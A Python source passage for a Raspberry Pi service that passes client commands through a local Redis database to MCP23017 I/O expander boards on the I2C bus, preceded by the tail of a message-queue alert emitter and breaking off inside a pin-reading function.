channel.queue_declare(queue='alert_events')
data['event_type'] = type
body = json.dumps(data)
channel.basic_publish(exchange='', routing_key='alert_events', body=body.encode('utf-8'))
connection.close()
except Exception as e:
logging.error("There was an error with MQ. Exception: {0}".format(e))
thread = Thread(target = emitter)
thread.setDaemon(True)
thread.start()
|
mcp23017server.py
|
#!/usr/bin/env python
"""
MCP23017 Control Service.
A service that acts as an interface between (e.g. Home Assistant) clients and the I2C bus on a Raspberry Pi.
Author: find me on codeproject.com --> JurgenVanGorp
"""
import traceback
import os
import sys
import time
import logging
import redis
from logging.handlers import RotatingFileHandler
import xml.etree.ElementTree as ET
from datetime import datetime
from smbus2 import SMBus
from threading import Thread, Lock
VERSION = "1.00"
###
### USER EDITABLE CONSTANTS #####################################################################
###
# CONFIGURATION_FILE is the name of the configuration file that will be written on the home
# location of the current user when running the program. The configuration file is read at
# the first start of the program, e.g. after a power failure, to make sure that the
# MCP23017 devices are reconfigured to their latest state.
# The CONFIGURATION _FILE contains the latest configured MCP23017 DIR values, which will
# be written on the I2C channel once on the bus after e.g. a cold boot.
# Remark that the dot in front of the filename makes it invisible for a regular ls.
# CONFIGURATION_FILE = ".mcp23017control.xml" --> Default value
# CONFIGURATION_FILE = '' --> Set to empty string to disable this feature.
CONFIGURATION_FILE = ".mcp23017server.xml"
# LOG_LEVEL determines the level of logging output into the system logs.
# Log Level = 0 --> No logging at all
# Log Level = 1 --> (DEFAULT) give details on application status and errors only
# Log Level = 2 --> Babble, babble, babble ...
# Remark that the dot in front of the filename makes it invisible. the file is saved
# in your home folder.
LOG_LEVEL = 1
LOG_FILE = '.mcp23017server.log'
# DEMO_MODE_ONLY = True --> Print on screen what would happen on the I2C bus. Use this
# when e.g. running the program manually (not as a service) to verify operation for
# your own software.
# DEMO_MODE_ONLY = False --> Actually write the values on the I2C bus
DEMO_MODE_ONLY = False
# Acceptable Commands for controlling the I2C bus
# These are the commands you need to use to control the DIR register of the MCP23017, or
# for setting and clearing pins.
FINDBOARD = "IDENTIFY" # Identify Board number, return 1 if found on the I2C bus
GETDIRBIT = "GETDBIT" # Read the specific IO pin dir value (1 = input)
GETDIRREGISTER = "GETDIRREG" # Read the full DIR register (low:1 or high:2)
SETDIRBIT = "SETDBIT" # Set DIR pin to INPUT (1)
CLEARDIRBIT = "CLRDBIT" # Clear DIR pin command to OUTPUT (0)
GETIOPIN = "GETPIN" # Read the specific IO pin value
GETIOREGISTER = "GETIOREG" # Read the full IO register (low:1 or high:2)
SETDATAPIN = "SETPIN" # Set pin to High
CLEARDATAPIN = "CLRPIN" # Set pin to low
TOGGLEPIN = "TOGGLE" # Toggle a pin to the "other" value for TOGGLEDELAY time
# If a pin is high, it will be set to low, and vice versa
TOGGLEDELAY = 0.1 # Seconds that the pin will be toggled. Default = 100 msec
# The COMMAND_TIMEOUT value is the maximum time (in seconds) that is allowed between pushing a
# button and the action that must follow. This is done to protect you from delayed actions
# whenever the I2C bus is heavily used, or the CPU is overloaded. If you e.g. push a button,
# and the I2C is too busy with other commands, the push-button command is ignored when
# COMMAND_TIMEOUT seconds have passed. Typically you would push the button again if nothing
# happens after one or two seconds. If both commands are stored, the light is switched on and
# immediately switched off again.
# Recommended minimum value one or two seconds
# COMMAND_TIMEOUT = 2
# Recommended maximum value is 10 seconds. Feel free to set higher values, but be prepared that
# you can can experience strange behaviour if there is a lot of latency on the bus.
COMMAND_TIMEOUT = 1.5
# Communications between Clients and the server happen through a Redis in-memory database
# so to limit the number of writes on the (SSD or microSD) storage. For larger implementations
# dozens to hundreds of requests can happen per second. Writing to disk would slow down the
# process, and may damage the storage.
# Make sure to have Redis installed in the proper locations, e.g. also in the virtual python
# environments. The default is that Redis is installed on localhost (127.0.0.1).
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
###
### PROGRAM INTERNAL CONSTANTS ####################################################################
###
# Software version
VERSION = '0.9.0'
# MCP23017 default parameters are that you can address the devices in the 0x20 to 0x2F
# address space with the three selector pins. You can change these if you want to use
# the software for other I2C devices.
MINBOARDID = 0x20 # Minimum I2C address
MAXBOARDID = 0x2f # Maximum I2C address
MINPIN = 0x00 # Minimum pin on the MCP23017
MAXPIN = 0x10 # Maximum pin on the MCP23017, +1 (i.e. must be lower than this value)
# TimeOut in seonds before the threads are considered dead. If the time-out is reached,
# the thread will crash and die, and is expected to be restarted as a service
WATCHDOG_TIMEOUT = 5
### Define MCP23017 specific registers
IODIRA = 0x00 # IO direction A - 1= input 0 = output
IODIRB = 0x01 # IO direction B - 1= input 0 = output
IPOLA = 0x02 # Input polarity A
IPOLB = 0x03 # Input polarity B
GPINTENA = 0x04 # Interrupt-onchange A
GPINTENB = 0x05 # Interrupt-onchange B
DEFVALA = 0x06 # Default value for port A
DEFVALB = 0x07 # Default value for port B
INTCONA = 0x08 # Interrupt control register for port A
INTCONB = 0x09 # Interrupt control register for port B
IOCON = 0x0A # Configuration register
GPPUA = 0x0C # Pull-up resistors for port A
GPPUB = 0x0D # Pull-up resistors for port B
INTFA = 0x0E # Interrupt condition for port A
INTFB = 0x0F # Interrupt condition for port B
INTCAPA = 0x10 # Interrupt capture for port A
INTCAPB = 0x11 # Interrupt capture for port B
GPIOA = 0x12 # Data port A
GPIOB = 0x13 # Data port B
OLATA = 0x14 # Output latches A
OLATB = 0x15 # Output latches B
ALLOUTPUTS = "0xff" # Initial value of DIR register if not yet used
# The dummy command is sent during initialization of the database and verification if
# the database can be written to. Dummy commands are not processed.
DUMMY_COMMAND = 'dummycommand'
### END OF CONSTANTS SECTION #########################################################
class databaseHandler():
"""
A class for communicating between the server and clients through a shared memory Redis
database. Two databases are initiated (or used) for communicating from client to
server (0) or from server to client (1).
"""
def __init__(self, the_log):
# Commands have id datetime.now().strftime("%d-%b-%Y %H:%M:%S.%f")}, i.e. the primary key is a timestamp.
# Commands given at exactly the same time, will overwrite each other, but this is not expected to happen.
# The commands table is then formatted as (all fields are TEXT, even if formatted as "0xff" !!)
# id, command TEXT, boardnr TEXT DEFAULT '0x00', pinnr TEXT DEFAULT '0x00', datavalue TEXT DEFAULT '0x00'
self._commands = None
# Responses have id datetime.now().strftime("%d-%b-%Y %H:%M:%S.%f")}, i.e. the primary key is a timestamp.
# The Responses table is then formatted as (all fields are TEXT, even if formatted as "0xff" !!)
# id, command_id TEXT, datavalue TEXT, response TEXT
self._responses = None
# Copy logfile to local
self._log = the_log
# Initialize database
self.OpenAndVerifyDatabase()
def OpenAndVerifyDatabase(self):
"""
Opens an existing database, or creates a new one if not yet existing. Then
verifies if the Redis database is accessible.
"""
# First try to open the database itself.
try:
# Open the shared memory databases.
# Redis database [0] is for commands that are sent from the clients to the server.
nowTrying = "Commands"
self._log.info(1, "Opening Commands database.")
self._commands = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, db=0)
# Redis database [1] is for responses from the server so the clients.
nowTrying = "Responses"
self._log.info(1, "Opening Responses database.")
self._responses = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, db=1)
except OSError as err:
# Capturing OS error.
self._log.error(1, "FATAL OS ERROR. Could not open [{}] database. This program is now exiting with error [{}].".format(nowTrying, err))
# If a database cannot be opened, this program makes no sense, so exiting.
sys.exit(1)
except:
# Capturing all other errors.
self._log.error(1, "FATAL UNEXPECTED ERROR. Could not open [{}] database. This program is now exiting with error [{}].".format(nowTrying, sys.exc_info()[0]))
# If a database cannot be opened, this program makes no sense, so exiting.
sys.exit(1)
# Do a dummy write to the Commands database, as verification that the database is fully up and running.
try:
# Remember: fields are: id, command TEXT, boardnr TEXT DEFAULT '0x00', pinnr TEXT DEFAULT '0x00', datavalue TEXT DEFAULT '0x00'
self._log.info(2, "Verifying Commands database with dummy write.")
id = (datetime.now() - datetime.utcfromtimestamp(0)).total_seconds()
datamap = {'command':DUMMY_COMMAND, 'boardnr':0x00, 'pinnr':0xff, 'datavalue':0x00}
# Write the info to the Redis database
self._commands.hset(id, None, None, datamap)
# Set expiration to a short 1 second, after which Redis will automatically delete the record
self._commands.expire(id, 1)
except:
# Capturing all errors.
self._log.error(1, "FATAL UNEXPECTED ERROR. Could not read and/or write the [Commands] database. This program is now exiting with error [{}].".format(sys.exc_info()[0]))
# If a database cannot be processed, this program makes no sense, so exiting.
sys.exit(1)
# Next, do a dummy write to the Responses database, as verification that the database is fully up and running.
try:
# Remember: fields are: id, command_id TEXT, datavalue TEXT, response TEXT
self._log.info(2, "Verifying Responses database with dummy write.")
id = (datetime.now() - datetime.utcfromtimestamp(0)).total_seconds()
datamap = {'datavalue':0x00, 'response':'OK'}
# Write the info to the Redis database
self._responses.hset(id, None, None, datamap)
# Set expiration to a short 1 second, after which Redis will automatically delete the record
self._responses.expire(id, 1)
except:
# Capturing all errors.
self._log.error(1, "FATAL UNEXPECTED ERROR. Could not read and/or write the [Responses] database. This program is now exiting with error [{}].".format(sys.exc_info()[0]))
# If a database cannot be processed, this program makes no sense, so exiting.
sys.exit(1)
def GetNextCommand(self):
"""
Fetches the oldest command - that has not expired - from the commands buffer.
"""
# Get all keys from the Commands table
rkeys = self._commands.keys("*")
# Key IDs are based on the timestamp, so sorting will pick the oldest first
rkeys.sort()
# Check if there are keys available
if len(rkeys) > 0:
# Get the first key from the list
id = rkeys[0]
# Read the Redis data
datarecord = self._commands.hgetall(id)
# We have the data, now delete the record (don't wait for the time-out)
self._commands.delete(id)
# pull the data from the record, and do proper conversions.
# Correct potential dirty entries, to avoid that the software crashes on poor data.
try:
return_id = float(id.decode('ascii'))
except:
return_id = 0
try:
command = datarecord[b'command'].decode('ascii')
except:
command = ''
try:
boardnr = datarecord[b'boardnr'].decode('ascii')
except:
boardnr = 0x00
try:
pinnr = datarecord[b'pinnr'].decode('ascii')
except:
pinnr = 0x00
try:
datavalue = datarecord[b'datavalue'].decode('ascii')
except:
datavalue = 0x00
# return the data read
return(return_id, command, boardnr, pinnr, datavalue)
else:
# return a zero record if nothing was received
return (0, '', 0x00, 0x00, 0x00)
def ReturnResponse(self, id, value, response):
"""
Returns the data value to the client through the Responses buffer.
Also does the house-keeping, deleting all old entries that would still exist.
"""
# Remember: fields are : id, command_id TEXT, datavalue TEXT, response TEXT
# The Response ID is the same as the Command ID, making it easy for the client to capture the data.
mapping = {'command_id':id, 'datavalue':value, 'response':response}
self._responses.hset(id, None, None, mapping)
# set auto-delete time-out in the Redis database. Add several seconds grace period, and round to integer values
self._responses.expire(id, round(COMMAND_TIMEOUT + 2))
class mcp23017broker():
"""
A class that is a man in the middle between external clients and I2C attached devices.
This class is based on a shared memory database.
"""
def __init__(self, the_log, i2chandler, xmldata = None):
# Copy logfile to local
self._log = the_log
# Create a handler for the I2C communications
self._i2chandler = i2chandler
# Inherit the xmldata communication
self._xmldata = xmldata
# Create a data pipe to the in-memory database
self._datapipe = databaseHandler(self._log)
def service_commands(self):
"""
Process incoming data coming from the connected clients (one at the time).
Properly formatted commands are processed immediately, or as separate threads (for long-lasting commands).
"""
# Fetch a command from the pipe
command_list = self._datapipe.GetNextCommand()
# a command id larger than 0 is a successful read. Command ID zero is returned if the pipe is empty.
if command_list[0] > 0:
self._log.info(2, "Received command with id [{}]: [{}] for board [{}] and pin [{}].".format(str(command_list[0]), command_list[1], str(command_list[2]), str(command_list[3])))
# Start the reply error with an empty error
self._return_error = ""
# retrieve commands from the pipe
command_id = command_list[0]
the_command = command_list[1]
the_board = command_list[2]
the_pin = command_list[3]
# During initialization a dummy command is sent. This is also done by the clients, so make sure that these commands are thrown away.
if the_command != DUMMY_COMMAND:
# Inputs can have different formats, also numerical as hexadecimal (e.g. '0x0f'). Convert where necessary.
if(isinstance(the_board,str)):
if 'x' in the_board:
the_board = int(the_board, 16)
else:
the_board = int(the_board, 10)
the_value = command_list[3]
if(isinstance(the_value,str)):
if 'x' in the_value:
the_value = int(the_value, 16)
else:
the_value = int(the_value, 10)
# Describe what we are expecting on the bus.
set_expectation = "Error: first command must be one of the following {}, {}, {}, {}, {}, {}, {}, {}, {}, {}. ".format(FINDBOARD, GETDIRBIT, GETDIRREGISTER, SETDIRBIT, CLEARDIRBIT, GETIOPIN, GETIOREGISTER, SETDATAPIN, CLEARDATAPIN, TOGGLEPIN)
# Using a try here, because the command could also be very, very dirty.
try:
if the_command not in {FINDBOARD, GETIOPIN, SETDIRBIT, CLEARDIRBIT, GETDIRBIT, SETDATAPIN, CLEARDATAPIN, GETIOREGISTER, GETDIRREGISTER, TOGGLEPIN}:
self._return_error += set_expectation
self._log.info(2, set_expectation)
except:
# Exception can happen if the_command is something _very_ weird, so need to capture that too without crashing
self._return_error += set_expectation
self._log.info(2, set_expectation)
# Test if Board ID is a hex number within allowed Board IDs
try:
if not(the_board in range(MINBOARDID, MAXBOARDID)):
self._return_error += "Error: Board ID not in range [0x{:0{}X}, 0x{:0{}X}]. ".format(MINBOARDID, 2, MAXBOARDID-1, 2)
self._log.info(2, "Error: Board ID not in range [0x{:0{}X}, 0x{:0{}X}]. ".format(MINBOARDID, 2, MAXBOARDID-1, 2))
except:
# print error message to the systemctl log file
if LOG_LEVEL == 2:
print(traceback.format_exc())
self._return_error += "Error: wrongly formatted register. "
self._log.info(2, "Error: wrongly formatted register. ")
# Test if the pin number is a hex number from 0x00 to 0x0f (included)
try:
if not(the_value in range(MINPIN, MAXPIN)):
self._return_error += "Error: registervalue not in range [0x{:0{}X}, 0x{:0{}X}]. ".format(MINPIN, 2, MAXPIN, 2)
self._log.info(2, "Error: registervalue not in range [0x{:0{}X}, 0x{:0{}X}]. ".format(MINPIN, 2, MAXPIN, 2))
except:
# print error message to the systemctl log file
if LOG_LEVEL == 2:
print(traceback.format_exc())
self._return_error += "Error: wrongly formatted data byte. "
self._log.info(2, "Error: wrongly formatted data byte. ")
# All checks done, continue processing if no errors were found.
if self._return_error == '':
# print status message to the systemctl log file
if LOG_LEVEL == 2:
print("Processing: {}, {}, {}.".format(the_command, the_board, the_value))
# Command format looks good, now process it and get the result back
return_data = self.ProcessCommand(the_command, the_board, the_value)
# Send an "OK" back, since we didn't find an error.
self._datapipe.ReturnResponse(command_id, return_data, 'OK')
self._log.debug(2, "Action result: {} OK\n".format(return_data))
else:
# print error message to the systemctl log file
if LOG_LEVEL > 0:
print(self._return_error)
# Send back an error if the command was not properly formatted. Do nothing else
self._datapipe.ReturnResponse(command_id, '0x00', self._return_error)
def ProcessCommand(self, task, board_id, pin):
"""
Identifies command and processes the command on the I2C bus.
"""
# Process I2C bus commands based on board ID and Pin nr
return_byte = ""
try:
if task == GETDIRBIT:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
return_byte = '0x{:0{}X}'.format(self._i2chandler.GetI2CDirPin(board_id, pin),2)
self._log.info(2, "Received byte [{}] from pin [{}] on board [{}] through GetI2CDirPin".format(return_byte, pin, board_id))
elif task == FINDBOARD:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
return_byte = '0x{:0{}X}'.format(self._i2chandler.IdentifyBoard(board_id),2)
self._log.info(2, "Received byte [{}] from board [{}] through IdentifyBoard".format(return_byte, board_id))
elif task == GETDIRREGISTER:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
return_byte = '0x{:0{}X}'.format(self._i2chandler.GetI2CDirRegister(board_id, pin),2)
self._log.info(2, "Received byte [{}] from pin [{}] on board [{}] through GetI2CDirRegister".format(return_byte, pin, board_id))
elif task == SETDIRBIT:
return_byte = ""
self._i2chandler.SetI2CDirPin(board_id, pin)
self._log.info(2, "Setting DIR bit [{}] on board [{}] through SetI2CDirPin".format(pin, board_id))
if self._xmldata is not None:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
self._xmldata.set_board_pin(board_id, pin)
elif task == CLEARDIRBIT:
return_byte = ""
self._i2chandler.ClearI2CDirPin(board_id, pin)
self._log.info(2, "Clearing DIR bit [{}] on board [{}] through ClearI2CDirPin".format(pin, board_id))
if self._xmldata is not None:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
self._xmldata.clear_board_pin(board_id, pin)
elif task == GETIOPIN:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
return_byte = '0x{:0{}X}'.format(self._i2chandler.GetI2CPin(board_id, pin),2)
self._log.info(2, "Received byte [{}] from pin [{}] on board [{}] through GetI2CPin".format(return_byte, pin, board_id))
elif task == GETIOREGISTER:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
return_byte = '0x{:0{}X}'.format(self._i2chandler.GetI2CIORegister(board_id, pin),2)
self._log.info(2, "Received Register [{}] from pin [{}] on board [{}] through GetI2CIORegister".format(return_byte, pin, board_id))
elif task == SETDATAPIN:
return_byte = ""
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
self._i2chandler.SetI2CPin(board_id, pin)
self._log.info(2, "Setting bit [{}] on board [{}] through SetI2CPin".format(pin, board_id))
elif task == CLEARDATAPIN:
return_byte = ""
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
self._i2chandler.ClearI2CPin(board_id, pin)
self._log.info(2, "Clearing bit [{}] on board [{}] through ClearI2CPin".format(pin, board_id))
elif task == TOGGLEPIN:
return_byte = ""
self._i2chandler.ToggleI2CPin(board_id, pin)
self._log.info(2, "Toggling bit [{}] on board [{}] through ToggleI2CPin".format(pin, board_id))
else:
# print error message to the systemctl log file
if LOG_LEVEL > 1:
print("Error: Did not understand command [{}].".format(task))
self._log.error(2, "Error: Did not understand command [{}].".format(task))
except Exception as err:
error_string = traceback.format_exc()
# print error message to the systemctl log file
if LOG_LEVEL == 1:
print(error_string)
if self._xmldata is not None:
self._xmldata.DeleteKey(board_id)
self._log.error(1, "Error when processing I2C command: {}.".format(error_string))
return return_byte
class i2cCommunication():
"""
A class for doing communications to MCP23017 devices on the Raspberry Pi I2C bus.
"""
def __init__(self, the_log):
# Copy logfile to local
self._log = the_log
self._log.info(2, "Initializing I2C Communication class.")
# Create an empty set to be used for avoiding that multiple toggle commands can operate on the same pin
# A mutex is needed to manage the self._toggle_set in a unique way
self._toggle_set = set()
self._toggle_mutex = Lock()
# Create a new I2C bus (port 1 of the Raspberry Pi)
if DEMO_MODE_ONLY:
self.i2cbus = 0
else:
self.i2cbus = SMBus(1)
self._log.info(2, "Initializing SMBus 1 (I2C).")
# Set up a Mutual Exclusive lock, such that parallel threads are not interfering with another thread writing on the I2C bus
self._i2cMutex = Lock()
self._log.info(2, "Initialized I2C Mutex.")
# Initialize the boards that are being handled.
self.managedboards = []
@property
def allmanagedboards(self):
return self.managedboards
def CheckInitializeBoard(self, board_id):
"""
Verifies if a board is already in the managed list.
If not, the Control Register for the board is initialized.
"""
# if board_id is given as a hex string, convert to int
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
return_value = True
try:
# check if a board is already managed. This lookup will result in an error if not
dummy = (self.managedboards.index(board_id) >= 0)
except:
# Wait for the I2C bus to become free
self._log.info(2, "Writing data [0x02] to IOCON register for board [0x{:0{}X}]".format(board_id, 2))
self._i2cMutex.acquire()
try:
# Initialize configuration register of the new board
if DEMO_MODE_ONLY:
print("SIMULATION : writing data [0x02] to IOCON register for board [0x{:0{}X}]".format(board_id, 2))
else:
self.i2cbus.write_byte_data(board_id, IOCON, 0x02)
# Since existing yet, add board to managed list if initialization was successful
self.managedboards.append(board_id)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
if not(return_value):
self._log.error(2, "Writing [0x02] to IOCON register for board [0x{:0{}X}] Failed !".format(board_id, 2))
return return_value
def ReadI2CDir(self, board_id, port_id):
"""
Function for reading the full DIR Register value for a specific IO board.
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(port_id,str)):
port_id = int(port_id, 16)
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = -1
# Only start writing if the I2C bus is available
self._log.info(2, "Reading DIR port [0x{:0{}X}] on board [0x{:0{}X}]".format(port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
# Read the current value of the DIR register
if DEMO_MODE_ONLY:
print("SIMULATION : reading DIR port [0x{:0{}X}] on board [0x{:0{}X}]".format(port_id, 2, board_id, 2))
return_value = 0xff
else:
return_value = self.i2cbus.read_byte_data(board_id, port_id)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = -1
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = -1
return return_value
def WriteI2CDir(self, board_id, port_id, newvalue):
"""
Function for writing the full DIR Register value for a specific IO board
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(port_id,str)):
port_id = int(port_id, 16)
if(isinstance(newvalue,str)):
newvalue = int(newvalue, 16)
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = True
# Only start writing if the I2C bus is available
self._log.info(2, "Writing DIR port [0x{:0{}X}] on board [0x{:0{}X}] to new value [0x{:0{}X}]".format(port_id, 2, board_id, 2, newvalue, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
print("SIMULATION : writing DIR port [0x{:0{}X}] on board [0x{:0{}X}] to new value [0x{:0{}X}]".format(port_id, 2, board_id, 2, newvalue, 2))
return_value = True
else:
# Write the new value of the DIR register
self.i2cbus.write_byte_data(board_id, port_id, newvalue)
# Verify if the value is indeed accepted
verification = self.i2cbus.read_byte_data(board_id, port_id)
if verification != newvalue:
return_value = False
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = False
return return_value
def IdentifyBoard(self, board_id):
"""
Identifies if board exists on the I2C bus.
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = 1
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
pin_nr = 1 # pick random pin number to be read from the board. We are not going to use it anyway.
port_id = IODIRA
# Only start reading if the I2C bus is available
self._log.info(2, "Reading DIR pin from port [0x{:0{}X}] of board [0x{:0{}X}]".format(port_id, 2, board_id, 2))
#self.i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
return_value = (1 << pin_nr)
print("SIMULATION : reading DIR pin [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(return_value, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
_ = self.i2cbus.read_byte_data(board_id, port_id) & (1 << pin_nr)
return_value = 1
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = 0
#finally:
# # Free Mutex to avoid a deadlock situation
# self.i2cMutex.release()
else:
return_value = 0
return return_value
def GetI2CDirPin(self, board_id, pin_nr):
"""
Gets the current value of the DIR value of an pin on a board
Pin number must be between 0 and 15
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = -1
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = 1
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (pin_nr > 7):
port_id = IODIRB
pin_nr = pin_nr % 8
else:
port_id = IODIRA
# Only start reading if the I2C bus is available
self._log.info(2, "Reading DIR pin from port [0x{:0{}X}] of board [0x{:0{}X}]".format(port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
return_value = (1 << pin_nr)
print("SIMULATION : reading DIR pin [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(return_value, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
if (self.i2cbus.read_byte_data(board_id, port_id) & (1 << pin_nr)) == 0x00:
return_value = 0
else:
return_value = 1
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = -1
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = -1
return return_value
def GetI2CDirRegister(self, board_id, reg_nr):
"""
Gets the current value of the DIR value of a pin on a board
Pin number must be between 0 and 15
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(reg_nr,str)):
reg_nr = int(reg_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (reg_nr < 0) or (reg_nr > 15):
return_value = -1
#aise Exception("Pin number must be between 0 and 15, but got [", pin_nr, "] for board ", board_id)
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = 1
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (reg_nr > 0):
port_id = IODIRB
else:
port_id = IODIRA
# Only start reading if the I2C bus is available
self._log.info(2, "Reading DIR register from port [0x{:0{}X}] of board [0x{:0{}X}]".format(port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
return_value = 0xff
print("SIMULATION : reading DIR register [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(return_value, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
return_value = self.i2cbus.read_byte_data(board_id, port_id)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = -1
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = -1
return return_value
def SetI2CDirPin(self, board_id, pin_nr):
"""
Sets a pin to INPUT on a board
Pin number must be between 0 and 15
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = False
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = True
# Pin values up to 0x0f go to IODIRA, higher values go to IODIRB
if (pin_nr > 7):
port_id = IODIRB
pin_nr = pin_nr % 8
else:
port_id = IODIRA
# Only start writing if the I2C bus is available
self._log.info(2, "Setting pin [0x{:0{}X}] to INPUT port [0x{:0{}X}] for board [0x{:0{}X}]".format(pin_nr, 2, port_id, 2, board_id,2))
self._i2cMutex.acquire()
try:
# Read the current state of the IODIR, then set ('OR') the one pin
if DEMO_MODE_ONLY:
data_byte = (1 << pin_nr)
print("SIMULATION : setting pin [0x{:0{}X}] to INPUT port [0x{:0{}X}] for board [0x{:0{}X}]".format(data_byte, 2, port_id, 2, board_id,2))
else:
data_byte = self.i2cbus.read_byte_data(board_id, port_id) | (1 << pin_nr)
self.i2cbus.write_byte_data(board_id, port_id, data_byte)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = False
return return_value
def ClearI2CDirPin(self, board_id, pin_nr):
"""
Sets a pin to OUTPUT on a board
Pin number must be between 0 and 15
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = False
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = True
# Pin values up to 0x0f go to IODIRA, higher values go to IODIRB
if (pin_nr > 7):
port_id = IODIRB
pin_nr = (pin_nr % 8)
else:
port_id = IODIRA
# Only start writing if the I2C bus is available
self._log.info(2, "Setting pin [0x{:0{}X}] to OUTPUT on port [0x{:0{}X}] for board [0x{:0{}X}]".format(pin_nr, 2, port_id, 2, board_id,2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
data_byte = (1 << pin_nr)
print("SIMULATION : Setting pin [0x{:0{}X}] to OUTPUT on port [0x{:0{}X}] for board [0x{:0{}X}]".format(data_byte, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IODIR, then clear ('AND') the one pin
data_byte = self.i2cbus.read_byte_data(board_id, port_id) & ~(1 << pin_nr)
self.i2cbus.write_byte_data(board_id, port_id, data_byte)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = False
return return_value
def GetI2CPin(self, board_id, pin_nr):
"""
Gets the current value of a pin on a board
Pin number must be between 0 and 15
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = -1
#aise Exception("Pin number must be between 0 and 15, but got [", pin_nr, "] for board ", board_id)
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = 1
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (pin_nr > 7):
port_id = GPIOB
pin_nr = pin_nr % 8
else:
port_id = GPIOA
# Only start reading if the I2C bus is available
self._log.info(2, "Reading pin [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(pin_nr, 2, port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
return_value = (1 << pin_nr)
print("SIMULATION : reading pin [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(return_value, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
if (self.i2cbus.read_byte_data(board_id, port_id) & (1 << pin_nr)) == 0x00:
return_value = 0
else:
